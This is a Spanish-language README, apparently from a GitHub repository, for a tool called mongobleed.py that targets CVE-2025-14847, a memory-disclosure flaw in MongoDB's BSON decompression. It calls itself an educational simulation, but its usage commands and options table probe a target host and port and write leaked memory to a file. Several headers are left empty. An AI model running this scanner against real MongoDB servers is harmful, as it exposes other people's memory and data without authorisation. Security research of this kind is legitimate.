
Herramienta educativa de investigación que demuestra CVE-2025-14847, divulgación de memoria en la descompresión BSON de MongoDB. Simula fallos de verificación de límites y conceptos de seguridad de memoria para el análisis de vulnerabilidades.
Este repositorio contiene una herramienta de investigación educativa diseñada para demostrar los conceptos de seguridad de memoria detrás de CVE-2025-14847, una vulnerabilidad crítica descubierta en la implementación de descompresión BSON de MongoDB. La herramienta simula cómo una verificación incorrecta de límites durante la descompresión puede provocar la revelación de memoria.
Esta herramienta demuestra:
Requisitos previos
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Escaneo básico (offsets 20-8192)
python3 mongobleed.py --host <objetivo>
# Escaneo profundo para más datos
python3 mongobleed.py --host <objetivo> --max-offset 50000
# Rango personalizado
python3 mongobleed.py --host <objetivo> --min-offset 100 --max-offset 20000
Esta vulnerabilidad resalta problemas más amplios en la seguridad de bases de datos:
Recursos Oficiales:
| Opción | Por defecto | Descripción |
|---|
--host | localhost | Host MongoDB objetivo |
--port | 27017 | Puerto MongoDB objetivo |
--min-offset | 20 | Longitud mínima del documento a sondear |
--max-offset | 8192 | Longitud máxima del documento a sondear |
--output | leaked.bin | Archivo de salida para los datos filtrados |